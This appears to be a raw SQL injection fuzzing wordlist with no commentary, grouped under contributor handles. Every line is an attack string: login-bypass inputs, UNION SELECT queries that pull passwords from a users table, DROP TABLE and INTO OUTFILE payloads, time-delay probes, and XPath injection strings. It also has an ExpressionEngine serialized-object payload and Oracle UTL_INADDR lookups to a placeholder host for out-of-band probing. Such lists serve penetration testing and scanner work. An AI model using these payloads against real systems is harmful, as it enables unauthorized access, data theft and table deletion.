//c0rni3sm
8888'+AND+'1'+LIKE+'1 -->
8888'+AND+'2'+LIKE+'1 -->
8888'+AND+(@@TEXTSIZE>@@LANGID)+AND+'1'+LIKE+'1 -->
8888'+AND+(@@LANGID>@@TEXTSIZE)+'1'+LIKE+'1 -->

//camoufl4g3
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1-- 
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

//d0znpp
‘-sqlite_version()%20UNION%20SELECT%20password%20FROM%20users-%20-
sleep(9999)
)-sleep(9999
1337%20INTO%20OUTFILE%20‘xxx’--
1337)%20INTO%20OUTFILE%20‘xxx’--
123;DROP%20TABLE%20users--
123);DROP%20TABLE%20users--
)%20OR%20(SELECT%20password%20FROM%20users%20...
*/UNION%20SELECT%20password%20FROM%20users--

//jstnkndy
a:1:{s:+13:":new:username";O:67:"EllisLab\\\ExpressionEngine\\\Library\\\Parser\\\Conditional\\\Token\\\Variable":1:{s:+6:"lexeme";s:+'.$length.':"1+UNION+SELECT+SLEEP(5)+#+'.$garbage.'";}}

//sqlifuzzer
2 and 456=678
2 or 345=345
2 order by 9999
2 order by 1
2/0 and 456=678
2/1 or 345=345
2/*f*/and/*f*/456=678
2/*f*/or/*f*/345=345
a' and '456'='678
a' or '345'='345
a' and 'fghi'='fghj'-- #
a' or 'dfth'='dfth'-- #
a' order by 9999-- #
a' order by 1-- #
a'and/*g*/456=678-- #
a'or/*g*/345=345-- #
a' and '456'='678
a' or '345'='345
a' and 'fghi'='fghj'#
a' or 'dfth'='dfth'#
a' order by 9999#
a' order by 1#
a'||/**/456=678#
a'||/**/345=345#
a' and '456'='678
a' or '345'='345
a' and 'fghi'='fghj'--
a' or 'dfth'='dfth'--
a' order by 9999--
a' order by 1--
a'and/*d*/456=678--
a'or/*d*/345=345--
a' and '456'='678
a' or '345'='345
a' and 'fghi'='fghj'-- #
a' or 'dfth'='dfth'-- #
a' order by 9999-- #
a' order by 1-- #
a'and/*g*/456=678-- #
a'or/*g*/345=345-- #
345'%5d|//*|/a%5b'a
456'%5d|//a|/a%5b'a
345')%5d|//*|/a%5bcontains(a,'b
456')%5d|//a|/a%5bcontains(a,'b
a" and "456"="678
a" or "345"="345
a" and "fghi"="fghj"-- #
a" or "dfth"="dfth"-- #
a" order by 9999-- #
a" order by 1-- #
a"and/*g*/456=678-- #
a"or/*g*/345=345-- #
345"%5d|//*|/a%5b"a
456"%5d|//a|/a%5b"a
345")%5d|//*|/a%5bcontains(a,"b
456")%5d|//a|/a%5bcontains(a,"b
1 waitfor delay '0:0:X'--
1; waitfor delay '0:0:X'--
1'; waitfor delay '0:0:X'--
1); waitfor delay '0:0:X'--
1)); waitfor delay '0:0:X'--
1'); waitfor delay '0:0:X'--
1')); waitfor delay '0:0:X'--
1 or benchmark(100000000,MD5(1))#
1' or benchmark(100000000,MD5(1))#
1) or benchmark(100000000,MD5(1))#
1') or benchmark(100000000,MD5(1))#
1)) or benchmark(100000000,MD5(1))#
1')) or benchmark(100000000,MD5(1))#
1/(select UTL_INADDR.get_host_address('n0where329.z0m') from dual)--
1' AND 1=UTL_INADDR.get_host_address('n0where329.z0m')--
1 waitfor delay '0:0:X'--
1; waitfor delay '0:0:X'--
1'; waitfor delay '0:0:X'--
1); waitfor delay '0:0:X'--
1)); waitfor delay '0:0:X'--
1'); waitfor delay '0:0:X'--
1')); waitfor delay '0:0:X'--
1 or benchmark(100000000,MD5(1))#
1' or benchmark(100000000,MD5(1))#
1) or benchmark(100000000,MD5(1))#
1') or benchmark(100000000,MD5(1))#
1)) or benchmark(100000000,MD5(1))#
1')) or benchmark(100000000,MD5(1))#
1/(select UTL_INADDR.get_host_address('n0where329.z0m') from dual)--
1' AND 1=UTL_INADDR.get_host_address('n0where329.z0m')--

